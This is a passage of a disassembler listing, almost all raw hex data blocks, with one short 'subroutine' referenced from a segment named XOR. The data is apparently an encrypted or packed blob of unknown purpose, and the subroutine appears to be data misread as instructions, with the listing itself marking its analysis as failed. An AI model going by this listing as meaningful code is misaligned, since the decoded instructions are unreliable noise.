dd 88EE52B7h, 0F459BE23h, 60C52A8Fh, 826296FBh, 800A0996h
dd 3F09AE08h, 0D0F16E08h, 5A3F2180h, 90BD656h, 757B3B32h
dd 0FC1A78Ch, 4F2E20F9h, 6FA1755Bh, 0DABC0062h, 45412CF8h
dd 0B0908A0Bh, 0F60AE6C5h, 594741E3h, 0E6A29670h, 4D0EFAE4h
dd 5D6B8527h, 0AAA69A74h, 1D12EED8h, 9571564Ch, 0A8CED1B1h
dd 35161002h, 92B56763h, 0FFEED9C6h, 1BBD6316h, 0B88A6B61h
dd 1DF2CCC4h, 505E3236h, 0A9CAA48Fh, 26183EC7h, 85714B34h
dd 0F1BFBEAFh, 0FB1D1E08h, 986A4B41h, 0FFC8A6A4h, 583E2E17h
dd 0BBDB4567h, 7E9BFADh, 40512107h, 0C0BA8EA0h, 0FD0BFAFBh
dd 4AE92A14h, 0A4B28E78h, 101E0BF4h, 7B764552h, 8BE9B97h
dd 0A022FFE8h, 0D27D737Eh, 0B9FAD6C0h, 3D371A07h, 0B5A1875Dh
dd 321C7BAh, 51473E3Ch, 0ADC87B6Fh, 4765E7D5h, 858B4240h
dd 0C1E9BFA3h, 0BA9EBE0h, 9F4A6644h, 1E5B3AFh, 2C3F33EFh
dd 0F49A5B4Fh, 14F1C7D2h, 92413B20h, 86BA9680h, 0E5E6D3B4h
dd 6452193Fh, 0CCC6A35Fh, 101913C7h, 79741E44h, 0D2C2D8A3h
dd 4A341FEAh, 8C9AA1C7h, 0F7D7AB85h, 352711F8h, 98416763h
dd 1409F3D2h, 5547200Ch, 20C6937Dh, 4201F708h, 47685F40h
dd 0C0B26C75h, 20E89AE4h, 955B6C50h, 0C9C2CFB3h, 32220EF3h
dd 0CFE58B52h, 1CF3D3ABh, 3D5C3915h, 94298162h, 15F4D1CDh
dd 0AE10391Ah, 0BBBBAB79h, 26293ED7h, 73624D2Ah, 0A7FE98Ah
dd 0B8290A0Ch, 6A754B22h, 0D1D2AE98h, 552F12FFh, 8D997F75h
dd 2739DFB2h, 695F3614h, 0C5BD9387h, 0EB7DFFE4h, 74462B1Fh
dd 0C3BE8D1Fh, 102603DFh, 9C8A6750h, 0D0C2BC8Eh, 4D1E36F4h
dd 0AA9ED660h, 0CEEDE3C4h, 23340BFCh, 0BC8E5861h, 15CB86D0h
dd 495A3E25h, 0B09D9F6Fh, 3765EDCAh, 915D5F29h, 0BDD1BBC9h
dd 515D473h, 83825443h, 0F5CF969Fh, 2D412B09h, 0C8885B46h
dd 0EE2C5AAh, 8F3D5CFBh, 0ACBE9F75h, 0F2ACB8h, 6427DA24h
dd 0DDBE986Ah, 1AFD0FEBh, 8756412Eh, 0D4D78A9Eh, 4D2E081Ah
dd 8AAD7F5Bh, 0F7C6B19Eh, 703DF70Eh, 0AE807255h, 0EDF9F3DCh
dd 68381B32h, 20978168h, 2D36E205h, 5D767037h, 0B7A37586h
dd 3921FDE4h, 7AA16C56h, 0CDDDA9ABh, 30221CEDh, 94974A54h
dd 0AEEC6E6h, 3B503437h, 98988158h, 1EF2D5BAh, 4C4D2CCBh
dd 0ADB9A985h, 0D23EAC2h, 8172563Dh, 0E9CEDBA7h, 0B8261402h
dd 96545A1Dh, 0C6D2C698h, 512D1814h, 8D828678h, 0FDE7C5B0h
dd 6C515C6Fh, 0CFBA9C90h, 0EB1AFEE2h, 62524027h, 0B1A88682h
dd 0F2AF9F5h, 7686644Bh, 7E4FE86h, 41313D10h, 9C7E6249h
dd 0E7F1E5A7h, 43380B02h, 0A492755Eh, 1A04E9EBh, 5C6C4F31h
dd 0C8967DC3h, 1414E1C7h, 8D734F39h, 0CA3DBFA4h, 4413F1D8h
dd 9467574Eh, 0FFE4B94Bh, 88392F0Eh, 9985646Ch, 0F4E2C0BDh
dd 5F543A3Ah, 0A6BEBA8Ch, 0A4E6D2B7h, 756130F8h, 0D0BEAC79h
dd 2B190FDAh, 795B442Eh, 0E4C2B68Eh, 4032020Ah, 86B6626Ch
dd 0E2D7ABA7h, 40082604h, 0DC828C70h, 0EDF9E8B0h, 68362411h
dd 0CEA29A8Ah, 4D15E8F0h
dd 6C6F7B27h, 0C9ABA078h, 3112ECF3h, 988A444Fh, 0ECCE72BCh
dd 4D491F15h, 0C4B73C9Eh, 1E51FAE7h, 447C412Ch, 7F86815Eh
dd 0E295E3C4h, 6C444530h, 0ADA4A89Ch, 3511FBDCh, 87627C0Fh
dd 0DECEA3ACh, 243E30F0h, 8C464B48h, 0F5C35A80h, 503EF90Eh
dd 9DA19349h, 15F1DBA8h, 45BE8D6Fh, 0C4C23EC2h, 807DE247h
dd 87051240h, 0F5ABBA75h, 36F0D6BCh, 98E10DFCh, 8E94AEAh
dd 52562AE5h, 1CDEED6Ah, 0FBDD027Ch, 79BCB257h, 507547F3h
dd 7F29426Ah, 990A670Ah, 87F99ED8h, 0FB1A5Ah, 0E1E43C41h
dd 0D8FD6F6Bh, 0C8AC4EF8h, 0B0157A6Fh, 0F543CE7Bh, 0DC6452B7h
dd 30E0BE49h, 60DDEAA5h, 663186FBh, 38B3B465h, 0A4F234BBh
dd 4175343Fh, 0F134765Ah, 0E80DBF7Bh, 0E9EC775Eh, 0C0E577DBh
dd 581D8DE0h, 0AD75D73Eh, 48CE73h, 60D5C71Ch, 0D40A64Bh
dd 9A70C5AAh, 0A9E5FB6Ah, 0AFFAEA8Fh, 8CF1392Fh, 0F7E06EBFh
dd 3C46B90Eh, 5D35DA34h, 3CC0E7F6h, 67CC4AD7h, 9900957Eh
dd 80A537F7h, 0CF793DA8h, 8AD52287h, 3F1C05EEh, 0F0C23EE4h
dd 70C1E3CBh, 3DE0472Eh, 8CD93E82h, 0FFE8D11Ch, 8FE45502h
dd 0B81D9A1Ch, 0A55EEE53h, 0D0FB661Ch, 79AAD92Bh, 0A8B2C81Ch
dd 2505EF03h, 71765A40h, 81B5E3F6h, 1CF8E207h, 0B076C5D7h
dd 0AD557A54h, 11C12249h, 0C82D92CFh, 511AD363h, 0A045740Eh
dd 81F6ED61h, 781D2CA1h, 48E00E3h, 50CB1AA3h, 2225426Ah
dd 42396F9Ah, 743E5E83h, 0FA2F4772h, 6CAD365Bh, 1BE2A2DDh
dd 450F0FD9h, 83F8ADCAh, 0A16E3D4Fh, 30BD1E77h, 0F459BE2Ah
dd 630C7A06h, 21B66A2Bh, 38DDEC75h, 0A50D285Ah, 9AECDA3Fh
dd 7CE147B3h, 0B3647A16h, 700A923h, 0C5D1AB51h, 0C79E981Eh
dd 0A738E505h, 0D7355986h, 24256E16h, 8E726671h, 0DD7059CDh
dd 0B4596B93h, 0AB7926CEh, 4CBEE230h, 7B089D27h, 6B042DF9h
dd 0D08D9AD5h, 0FFA035F4h, 50B55CADh, 1479DE4Ch, 0EA868C2Ch
dd 7CDE7F35h, 1E2A3BC6h, 0C9294E25h, 0F28DF2E3h, 0B23BD354h
dd 2A38D277h, 74810B62h, 9D45AA0Fh, 37BA3BFCh, 55948227h
dd 24491C19h, 9811BE3Eh, 85DDCD2Bh, 0E9CD3297h, 0D437A62Fh
dd 443D566Fh, 3B1176DCh, 0D84A52BCh, 1DDD9B3h, 0F151D6A3h
dd 36F1268Bh, 0C829EAF7h, 6E3FE63h, 0BF506A23h, 0CC3E5AB0h
dd 59615A7h, 0E44AAAA6h, 0BA866B7Fh, 0BD07B7E9h, 288DF22Fh
dd 292CB083h, 25B7FBh, 80DBB30Dh, 0C0E9D2AEh, 44A90F77h
dd 0D4C1E132h, 1C81E86Bh, 7E05BF82h, 79B2BE63h, 83CFD64Fh
dd 0B846EFh, 89CB027Dh, 397CBCA6h, 1035077Bh, 0D121C364h
dd 7D90E047h, 54790B7Fh, 0F2E1D96Ch, 544D200Eh, 99F9D144h
dd 3710CE33h, 29E5145Fh, 8C7151DAh, 18DDC2A7h, 49CC5033h
dd 20C5D773h, 8EF9923Ch, 6CE0C227h, 0F93C36B7h, 0D0F5C807h
dd 240EDD1Ah, 50DB2E9h, 9479DA81h, 81924499h, 70D641DDh
dd 0BBBD627Ch, 0C4B6130Ch, 3395BA6Fh, 0CED4147Ch, 906012BBh
dd 74D93FBEh, 0E155260Ah, 1A31167Bh, 0FE0D0FADh, 238924D3h
dd 90F65B43h, 1C73462Bh, 0E987036Ch, 1202EEFDh, 0CB633732h
dd 0ADCB3426h, 0E9AFBD02h, 5A3A4E19h, 0E0E2216Eh, 5C1E69Dh
dd 4D20D3FEh, 3499FE3Eh, 9D63E74Ch, 0C97D67Bh, 78DD36BFh
dd 0D318FE13h, 90DF2A14h, 0BC259BEBh, 0AD80F257h, 94F95E3Eh
dd 653B48h, 9CA3B79Bh, 0E7E7DBB5h, 44A9ABF8h, 0B8CFFDDFh
dd 1B86FAF7h, 88EDBB3Bh, 0A939B223h, 3AA97E3Eh, 0CCB51306h
dd 45F20267h, 0C4298EF3h, 7550FB6Ch, 18B4937Fh, 241AD223h
dd 34EC5404h, 0D5D1B687h, 2F2377ECh, 0C7D02C57h, 0CB23B6A8h
dd 81C83A8Ah, 0DC5C96A1h, 1A8B6177h, 0A98D0B9Eh, 6074EA8Fh
dd 3C2106EBh, 0F85DBBBFh, 0DBAC6A93h, 3108EED9h, 0B1F4064Fh
dd 0A8CD80F7h, 0A259EC8h, 55E039Eh, 0EC1184E1h, 5ABD3A38h
dd 957A0EF3h, 0A578CAB1h, 9C4174EFh, 236C3FB4h, 67293EE3h
dd 909676C8h, 5BE2C7A9h, 0F8EA165Ch, 48856D53h, 0A519E72Ah
dd 0BFB9C6EBh, 7D98A717h, 7D3A9EC3h, 86585DAEh, 0DED2A58Fh
dd 132060Ch, 774C4012h, 0ACC1987Ah, 40230FBEh, 0A47C6152h
dd 0E6C7ABA2h, 563100F4h, 0A5806860h, 0BD01D8C2h, 432D1E0Bh
dd 50A3776Dh, 23EFE79Fh, 57453E3Ch, 96F98A72h, 3595712Fh
dd 7C01BD29h, 0C1C5B995h, 361234E0h, 9C76593Eh, 3ADABEACh
dd 56ED2607h, 0D4A0816Ch, 1F2CCAEh, 54532F09h, 7DCCAF5Dh
dd 0D4F18EA1h, 20A20A6Dh, 9C0366BCh, 0D553D231h, 92826549h
dd 0E9CF68CFh, 261E02E9h, 98FDFA7Ch, 85BECE33h, 30DAE67Ch
dd 0B3BEE40Bh, 48ADD26Ch, 0A9A50B9Eh, 4846EA8Fh, 26C5E2B6h
dd 48AA3D11h, 0ADC96EC8h, 2547BE9Bh, 4A226491h, 8BDA5722h
dd 0A3953D0h, 965C4A6Fh, 12AEE519h, 423A97ECh, 43294E22h
dd 0F0C48AE4h, 628AC0CBh, 469F46FDh, 96DAAF5Ah, 6D84C5CAh
dd 0C9E6700h, 0B83332E7h, 0B9FCF439h, 90B58763h, 0F47D1AAAh
dd 10E47F9Bh, 0D4399E07h, 4064483Eh, 8199E3F6h, 0E095E207h
dd 0DCDCC5AFh, 0F055BA22h, 0B00E4BAh, 72D4532h, 0F48686F8h
dd 0BCF682CFh, 0C219EDD6h, 77604936h, 2458B1A0h, 50ACF27Fh
dd 0EFCE86EBh, 1A9C241Ch, 0D0BD9AADh, 7CF2712Fh, 4D17670h
dd 0D83DA2FDh, 361901E6h, 96815038h, 6BB1E68Ch, 48FA0A2Ch
dd 0C8D64723h, 6FC5EA84h, 0ECB61BCCh, 0C19DC24Fh, 0E433AC58h
dd 85D82B3Fh, 7CA15327h, 0E8490A86h, 0C93E1E83h, 0C0E5920Ch
dd 8E67B14h, 0FDA299h, 735C3C05h, 57527901h, 2B416608h
dd 0F14A9547h, 0B4193E00h, 1D6077CCh, 402156FBh, 0F873C33Dh
dd 64C79661h, 45981AFFh, 3C61147Bh, 0DDB3325Ch, 5EFE6321h
dd 0B2E58ABCh, 41D6B4C1h, 587D072Ah, 94795C47h, 0A578CCB0h
dd 9C4174DFh, 0F4DA195Fh, 0BAD9FE95h, 0A02D5F94h, 4859167Bh
dd 0F1D82E7h, 5F483522h, 0D4078CEEh, 0CB610AF7h, 0A8DA960Ch
dd 0DBE13103h, 0CDA50A6Fh, 0EC09B230h, 0D5F20B47h, 84297BAFh
dd 4F3F8BF7h, 5CC58E66h, 915892F7h, 0F9DBC7ADh, 6C414023h
dd 8104D687h, 781D0F13h, 684C6E98h, 50B51BE2h, 0BC1EEE5Ah
dd 9D02F257h, 94B97641h, 0F8CA3FF8h, 4D1766Dh, 574030EDh
dd 7ABDC3F2h, 0BF157A1Fh, 1C8228CFh, 18C1D3B7h, 0C859BE24h
dd 60C62BA7h, 0D89EADFBh, 0B99DC23Ch, 0A40AFE17h, 0C4EC2A3Fh
dd 4B8F4691h, 2857968Ch, 9DF99B83h, 48BD7FA4h, 0BB91F64Ah
dd 58CAA63Ch, 87473933h, 30DA134Ch, 0F58EA60Bh, 65028FF4h
dd 0E3697E23h, 0E06FE2E4h, 8BB1D3BBh, 0F85E8DABh, 6089B993h
dd 0E0989A76h, 298A83F6h, 2D477297h, 1439D610h, 0AAE564B0h
dd 7B4FE01Ch, 18870EFCh, 332111F3h, 31A3765Ah, 197066CBh
dd 0C852AFACh, 46E9E8A3h, 0E4D2D15Eh, 0D1B1D64Dh, 0AA9A79A7h
dd 0A189EE53h, 0D0FAD86Ch, 0D469572Bh, 2710FC23h, 0D4392AABh
dd 0E67C506Fh, 0E0ED4264h, 4DE54F52h, 316E4EF3h, 0F095BFB3h
dd 0C9A9271Ch, 53F0D9BDh, 75A9DAA7h, 64FC626Fh, 2C32D21Fh
dd 9C193D9Fh, 0E9B1FE1Bh, 75B51A7Fh, 0BCF99415h, 7CFAB90Ah
dd 17F99EB8h, 479FBE73h, 0E156169Dh, 0D8FD8788h, 65110ED9h
dd 62157ADFh, 0CEE3D7Ah, 15ED12C9h, 0CB659A5Fh, 350DB73Ah
dd 0D0EB963Bh, 0A2DDFC2Fh, 0F7D4BED3h, 268567AAh, 62E0466Bh
dd 5EB3794h, 545F1E43h, 0C0257E87h, 0BB40255Bh, 58C7523Ch
dd 46D0333h, 3D423A9Fh, 0F2833398h, 0D52212B7h, 0B4597630h
dd 209B2026h, 9B2004ECh
dd 3827B69Ch, 6441B193h, 5BC6B1E9h, 7A2E8BC5h, 180DB2E9h
dd 49DB9050h, 18FD6ABFh, 0D644D31h, 61DC1115h, 1F2A7D80h
dd 5B487535h, 5A96EB95h, 3B6D9249h, 8F84BD07h, 55E87D78h
dd 4CF1E47Bh, 0CD28C767h, 988AEE13h, 0E525B2D5h, 71B4C62Bh
dd 688D3F23h, 0BCFE1383h, 54A50A2Fh, 0C58E35CCh, 187D2234h
dd 0CAE94EB3h, 0B07D6FA4h, 12AA268Bh, 0FF0D9C1h, 0F4A67EE8h
dd 0A0056ACFh, 102F8BBBh, 0C7D337A7h, 432C1433h, 0B6883A59h
dd 220AEA0Bh, 77AD133Ch, 0B1A28AA3h, 2F11AAD4h, 886E597Bh
dd 0B9CBC4ACh, 41CAEBE7h, 0D0359AD5h, 3CC4066Bh, 35421F06h
dd 9B397048h, 5E1DCB0h, 0C6367725h, 9DB19F95h, 9EDDABDh
dd 69494D2Eh, 0CCC2AECBh, 96DFBE7h, 79993A2Dh, 0E3C2BA97h
dd 403317EFh, 8C8C42A3h, 0DDC5B494h, 90FB19F9h, 9347AB38h
dd 0F00CDED8h, 9434240Ch, 997E70h, 6C0AF7DFh, 18795848h
dd 0BCA4977Dh, 3655AEF3h, 0A2C15856h, 0D6EACBA5h, 4D5911E7h
dd 0A986798Fh, 0E65690AFh, 4A5A3A3Ah, 0B68AAE58h, 1FFE1AC4h
dd 82218A20h, 0B6CAAB85h, 54CCF1C7h, 855A414Eh, 0E0FAF65Ch
dd 0D82C1BC7h, 896E5747h, 0E4AE7AE0h, 5881194Eh, 49AA7E78h
dd 5835A810h, 59BAFAB2h, 0D79BD0Fh, 2C5616A5h, 4D345E55h
dd 0A28DE4B6h, 0A69EE69Eh, 183B188h, 91D49E8Dh, 94140C58h
dd 4D83C69Dh, 44012CB6h, 971770FFh, 50B5E227h, 0BC2186EBh
dd 288DF257h, 94F95EC3h, 65CA2Fh, 6CD1369Bh, 0D83DA207h
dd 44A90E73h, 0B0157ADFh, 1C81E64Bh, 88ED52B7h, 0F459BE23h
dd 60C52A8Fh, 0CC3196FBh, 389D0267h, 0A4096ED3h, 1075DA3Fh
dd 7CE146ABh, 0E84DB217h, 0D7591E83h, 0EE854h, 9110F65Bh
dd 98BD2B1Dh, 0C714D533h, 6824AFB3h, 0E2883516h, 0C244276h
dd 76005AC7h, 0FB8E9C4Bh, 80005EF9h, 2349849Eh, 0F9523251h
dd 0D0F5C3A1h, 454783F4h, 0AD647297h, 0B661A0C2h, 84236BF8h
dd 83CE3E1Bh, 0C0BD6265h, 0C4298E57h, 309501B7h, 0C07EEBCBh
dd 0E16D9255h, 7005569Ch, 241EA8Eh, 0CA2E2D0Eh, 7B1D42B0h
dd 0A188C7C6h, 90B57C32h, 4CB4B68Ah, 0EBCDA9E3h, 8A579A2Bh
dd 22818FE8h, 7690769Bh, 437AEE47h, 945751E1h, 0A839709Ch
dd 6640DCC2h, 7295EF7h, 63982951h, 579D7AFDh, 0E704EDD6h
dd 22521D61h, 2C49EE4Ch, 13E1557Eh, 0C58F0376h, 0ADC8F217h
dd 94B9574Dh, 65CA2Fh, 6CD10AC3h, 66BA1D07h, 9CA9CEACh
dd 0FF8E954h, 1C81DE33h, 1672D5B7h, 0F4597E1Ch, 0DD3E22C4h
dd 0CC71785Bh, 0C52066FEh, 0A4C9A75Dh, 82F2517Eh, 0F5E186C4h
dd 2856288Ch, 54B8C683h, 89148AEFh, 0AC00819Ah, 6AFD62C7h
dd 735B331Bh, 1A623D8Ah, 0DF416624h, 54F39529h, 0BB9585E3h
dd 0A385EA50h, 8BF146D1h, 0F85DC7ABh, 6087B993h, 0AE6D72CFh
dd 0C1A0DDC6h, 0A8CD7B6Dh, 8E499C42h, 800ECAA7h, 75D1AFAFh
dd 18BC2E61h, 7CB0FFDAh, 6F767B60h, 1DB49D86h, 0D4A18E00h
dd 3D7DEBA3h, 0F9C4E2E6h, 0A3341D11h, 1E1D82E7h, 57FB66D4h
dd 3B7251EDh, 3261C62Bh, 9DCD3C16h, 0E4FF2908h, 4A1C0C86h
dd 44C207DAh, 978068D5h, 0AD8FFBB2h, 75EABA5Fh, 5B98FE4Bh
dd 0C82D0E7Bh, 8E063563h, 50052AB8h, 1B0383E3h, 225A4532h
dd 6349EE4Ch, 90DEB404h, 0E01D89EBh, 2ACD7506h, 0AFC39B2h
dd 80736D27h, 2D8016E4h, 1397EEBh, 40D22A8Fh, 1B554503h
dd 1B586734h, 3C92DD6Ah, 4C103F1Dh, 0F48CC0D4h, 75C817CDh
dd 0AC20632Eh, 7A80EFFDh, 6409875Dh, 0EF38C7CDh, 1C9CDA70h
dd 81F09F9Dh, 0D454D208h, 72A8774Dh, 8C1E3F92h, 34604F3Dh
dd 44B657CAh, 4EAEFD0Dh, 23ADD280h, 0E3CC2F8Ch, 6204B0FAh
dd 9A947FAFh, 0F81CC9B2h, 3CA12A79h, 0AF988814h, 60D273F3h
dd 20E77297h, 0B677F634h, 82E4E6EFh, 6B8D439h, 0D2D54A89h
dd 471C05E8h, 6110F21Dh, 0F4396331h, 47301F14h, 27D87823h
dd 0E2951A06h, 0C8D4700h, 0DFB4DCE7h, 0BE615639h, 0E5F4443Fh
dd 0D4525623h, 2710FFD4h, 0D4399F7Bh, 54F3866Fh, 3A3127E8h
dd 83877D7Dh, 84E906B8h, 52EC3A1Fh, 0E9466926h, 0C86D9E03h
dd 288A7B16h, 0A0056A0Fh, 0F7D563Bh, 6F33E2F7h, 2475DF98h
dd 50B51D7Fh, 929D8DECh, 0A08DF257h, 2C1DE998h, 5DDE2586h
dd 6C910F0Dh, 83933A57h, 78DA8B66h, 0B0157A1Fh, 0A90AE74Bh
dd 882D5B1Dh, 79048957h, 60051680h, 0CE3196FBh, 37B9A1AFh
dd 4C06DB05h, 3EEC3622h, 7C79A452h, 1CE41017h, 0AE8E8E82h
dd 94160722h, 2C91F61Bh, 25455AC7h, 0F969D6A0h, 8152A9B1h
dd 0DC41661Fh, 0C0A91277h, 0B421BB62h, 0A3EDE783h, 0E7F16E68h
dd 29DAD162h, 67C96EC7h, 24359AFFh, 0D60A966Fh, 3E8AED6Eh
dd 8F791E3Ch, 91D25EAh, 715C4AE3h, 587DEE58h, 0C4298EF2h
dd 173DC1D3h, 150BBD2Fh, 0C87638C4h, 7451A9A3h, 4B61490Fh
dd 4C8B9FD3h, 75B5DDE7h, 0D4FCE5CDh, 6C2832DFh, 5C09D86h
dd 7D10BA79h, 2FCA09A5h, 149697E6h, 5E1C769Bh, 187CA45Ah
dd 98564EB3h, 4F3749F7h, 0B4B4B666h, 7F0D690h, 494C7685h
dd 0B96C5F1h, 91F81DC2h, 781D0B11h, 1CD2763Ah, 613209EBh
dd 0C021C6FFh, 5C8DF257h, 54E2D6D1h, 58BC8259h, 705DF6A3h
dd 50CAEA5Eh, 0BB50ED5Ah, 7041AB64h, 1C81EE4Bh, 8231FB7h
dd 0B445A5A0h, 21F12A8Fh, 0A5297F53h, 63FAFC20h, 6409AE07h
dd 0B56BDDA3h, 7CA152D2h, 52DE42AEh, 489C9B09h, 107B8AAFh
dd 70E001Bh, 42FDA29Bh, 71478695h, 8406B792h, 0DC31A64Bh
dd 4FF91277h, 5A7F4753h, 0C62997B7h, 0E699A622h, 81B402F6h
dd 0A402B050h, 0E1B289FFh, 5CA1467Fh, 0DD0D72D7h, 0E514E4Ch
dd 0C0D12334h, 34EB201Bh, 0DDC8E208h, 0C469BA24h, 3095FA9Fh
dd 0E081691Fh, 0F10ACC4Fh, 1AD9FE97h, 66AA2366h, 0A7B1D654h
dd 0ECEEFF7Ah, 2489EE13h, 99E29ABFh, 815FF6BBh, 688D3EB0h
dd 0C5B64D69h, 0C0A54A63h, 0C11176DBh, 22C5323Eh, 44157838h
dd 0D2C541Fh, 44D2BEEDh, 0BC3E0FCAh, 3599FEA3h, 0A2316ACFh
dd 7177BF8Bh, 781D0E7Dh, 0DE488A53h, 90E13424h, 22C8E4EBh
dd 0DFDD73DFh, 0D4E54F48h, 63CA2Fh, 0C0CF439Bh, 29A9C3Fh
dd 2AA9CEA7h, 52BAF376h, 0A481A664h, 88ED6EC3h, 0E5D6ED8Ah
dd 68C5EA83h, 603196FBh, 691A1183h, 0A409AE07h, 6575DA43h
dd 7679D6B2h, 2859CD9Ch, 91E08883h, 94160722h, 2491F61Bh
dd 0A98A62C7h, 64E88695h, 84ECD795h, 779BA64Bh, 73435286h
dd 8D911CF8h, 0BE2E457h, 0CCF1168Fh, 9D53C5CBh, 64895ABAh
dd 55A035E1h, 3C61127Ch, 0A80D62D7h, 0D4FA56E5h, 44654D63h
dd 0C7AEC023h, 3EBD625Bh, 49D3959Ah, 30D5267Ah, 0AD7EB572h
dd 86D924Bh, 28193EA3h, 0E2951A08h, 0C7DFF00h, 3DA8DCE7h
dd 24491A84h, 90F57ABFh, 0FE2E44BBh, 0B7422E9Bh, 0AD96283Dh
dd 0C9A54A63h, 0ECEA0068h, 98D40047h, 8B564BAFh, 0BFD5BACFh
dd 0B367E666h, 8839A37Ch, 34D9FE63h, 466D08CFh, 606F630Ch
dd 2834E080h, 0FFC6B82Bh, 10B55AB3h, 4CC7894Bh, 190AC1CFh
dd 94F99EB7h, 1565CAAFh, 0E64B8699h, 98097B6Ch, 0C450EC73h
dd 0B78277CBh, 0DB01E6DBh, 0BF831282h, 0B445AFA8h, 61C52A8Fh
dd 1C3823FBh, 611AFCA7h, 3E09AE07h, 0A84FD196h, 21E7062Ah
dd 0E80DBE30h, 55298925h, 91A23945h, 2C91362Fh, 8DFD64C7h
dd 35E63D5Eh, 70D5FAD3h, 0B141A20Bh, 526DA25Dh, 74056968h
dd 0F0E2644Fh, 0CDF1168Fh
dd 0B077B2C7h, 1470AF75h, 602D75FFh, 571E102Bh, 120DB2EBh
dd 86A5B76h, 80E54A6Fh, 0DCDEB623h, 0C03C6A29h, 0F84F2BF9h
dd 0DBEFFA9Fh, 94E8675Bh, 8D638AC7h, 74192A89h, 0B1C2D965h
dd 4CB1D64Fh, 691D72E7h, 8AA65B48h, 9A5DDD67h, 3C6DF0D0h
dd 5B649097h, 41220843h, 4065F3E5h, 80E2F3EEh, 187DE207h
dd 93564ED3h, 0EB2CA9D0h, 44CABEEDh, 0BC432FEDh, 5859FEA3h
dd 8A6264CEh, 0B271960Fh, 2221BFEh, 5E49EE4Ch, 0DA5294C0h
dd 2221C604h, 2A3582EEh, 0D4E54748h, 8590242Fh, 6C91026Ch
dd 0D93DA206h, 44248A7Eh, 97BD7ADFh, 979B71AFh, 48F96334h
dd 0F40A3F23h, 77C32A8Fh, 0CC3196BCh, 0F09A8F66h, 0C284CAB6h
dd 107582D6h, 17BB46ABh, 6027B0ECh, 0AF53BB0Ah, 4FC0A657h
dd 0EC60615Dh, 1D08BD69h, 4A9FA64h, 71D53A9Fh, 610C6660h
dd 48ED1E88h, 0AC197EE3h, 789FC883h, 117CFA48h, 0F89D8EF8h
dd 66C92E93h, 0DA7627FAh, 0C04864CCh, 0CE05BF10h, 3A75BABBh
dd 0D0F4E506h, 0EA782023h, 35656A29h, 0F8500BF1h, 0DBEFFA9Fh
dd 0D59169B2h, 0F9EA21CDh, 74D9FE97h, 74C5AA0Fh, 26AC665Bh
dd 0F8E95B6Ch, 2EE9AF53h, 0B4EDD3BCh, 15FEC82Bh, 28CD72ABh
dd 98B9A127h, 61156573h, 3B699441h, 41DADC67h, 6AE90EE7h
dd 1D229B6h, 7CC1E69Fh, 7C2D92F7h, 25162DB2h, 0A0052AC3h
dd 0A051D63Bh, 7B9851A4h, 5849AE13h, 0FA45CA84h, 83A85952h
dd 210B67CEh, 55E05E83h, 50890BA8h, 454E4053h, 823DE2DBh
dd 78DA8B66h, 0B0157A1Fh, 18CDE68Bh, 0CB1DDA19h, 0E8423B29h
dd 6A5C2ACFh, 0ECC4EE1Dh, 6C765F5Dh, 3FE36E93h, 24A657B2h
dd 7CE0466Bh, 1B19B317h, 48AA9BB6h, 0C0258AAFh, 291DD65Bh
dd 98FC21DAh, 9D5CE33h, 0DB6BCA4Fh, 570431DAh, 8B67CFCh
dd 2DE169E3h, 69740E87h, 60C2D34Eh, 0F85DC267h, 62B62E13h
dd 0E44E177Ch, 3427062Bh, 0AB56F297h, 18FE96F2h, 70C186ECh
dd 0E471771Bh, 0BB149DD7h, 0F5E16CF5h, 162CD81Fh, 7481ED63h
dd 86DD2BFh, 0CFF35FA1h, 29C20557h, 94CB1490h, 6337C2B8h
dd 0A12FB103h, 0D0217E44h, 0DDE952Bh, 68CD72ABh, 9499E03h
dd 0D87C5971h, 270A2193h, 9054BAF6h, 1709EDAh, 0F095E3BDh
dd 653F938Ch, 0C12E9237h, 3875BAEAh, 901ACF48h, 59F8D67Bh
dd 781D0B29h, 0DC72B3Ah, 0D5201A3Fh, 0BCE192FCh, 288DF217h
dd 5C246077h, 618C86h, 0B950654Dh, 0D8FD6B61h, 8D251573h
dd 18157AE0h, 1C81E658h, 561B0FEEh, 0E6488268h, 2CF9E669h
dd 449EADFBh, 0C19DC23Ch, 0E4422458h, 48EC2D3Fh, 4B1949C7h
dd 2BC4CAE6h, 0AEDC677h, 359C311Ah, 2C51CFBDh, 0A4BB656Eh
dd 2D274BBCh, 32D43ADFh, 22BE2F13h, 0D3ADD280h, 27CC6612h
dd 2085EACFh, 9B7B8363h, 9EA23DB2h, 0BAC96ECCh, 0AF9F5357h
dd 0E20E91C6h, 330DB2E0h, 4E78E609h, 31725ABh, 6454B344h
dd 58BD2327h, 0C57F0AFEh, 0C594FA5Fh, 9C417F71h, 1BB5F36h
dd 603D3EE3h, 42C2A1A7h, 0C9B1167Bh, 3DF47E29h, 24492741h
dd 78C558BEh, 0CBB494ADh, 6167B716h, 9399EC3h, 4C60F566h
dd 0AD08F9E6h, 2494E247h, 0AD83DBECh, 7548BA5Fh, 5CC12798h
dd 0C17B0FF6h, 0B5B3FEA3h, 0AFE291B7h, 0C71EAC0h, 7A1DBDA7h
dd 3475F13Ah, 2F1F53D7h, 62B69F46h, 378D3260h, 94F9FA48h
dd 6AE2CD2Fh, 6FD17674h, 9806B48Ch, 5FA99973h, 32086E22h
dd 1C81E618h, 97E511BEh, 0F459FAA2h, 6285AD8Fh, 0CF1D55FAh
dd 786694ECh, 93D9C0D3h, 509E80F4h, 0B44E1DABh, 424DF22Ch
dd 0D9BCDE08h
; =============== S U B R O U T I N E =======================================
sub_3142BE00 proc far ; CODE XREF: XOR:3142A0C3�p
bound ecx, [edx+6A84C025h]
xchg eax, ecx
sub al, 0C7h
add es:[edi+4695AB8h], ah
lahf
mov edx, 231665F7h
enter 77DCh, 12h
and al, 0Eh
in al, 69h
pop eax
test al, 9Fh
add cl, [ebp+35h]
push esi
insd
retf 89D9h
sub_3142BE00 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 8Bh, 9Dh, 0F8h
dd 0E9C89D88h, 0D0F5C395h, 456F836Ah, 2D867297h, 1439D789h
dd 5CC4A26h, 0EC118F59h, 0DD841A15h, 0C469C7B5h, 30BAD3CDh
dd 6E5166CBh, 8502A4Ah, 325E3EA3h, 0CB0625BBh, 3CEF1979h
dd 0F1D3FFAEh, 2076EE13h, 6F05163Eh, 201D4D3Ch, 83249383h
dd 66B62542h, 60A54A58h, 759FC362h, 0E95E207h, 65DCC5A5h
dd 0F055BAB8h, 77C3F30Bh, 0D17B863Ah, 33A1BD5Ah, 0BFA84E4Dh
dd 91749FD6h, 776048F5h, 6565E29Ah, 50D14B22h, 8B745DEBh
dd 0A991CD22h, 94993A89h, 0D3176A2Fh, 50D5C1DBh, 118F1F8Ah
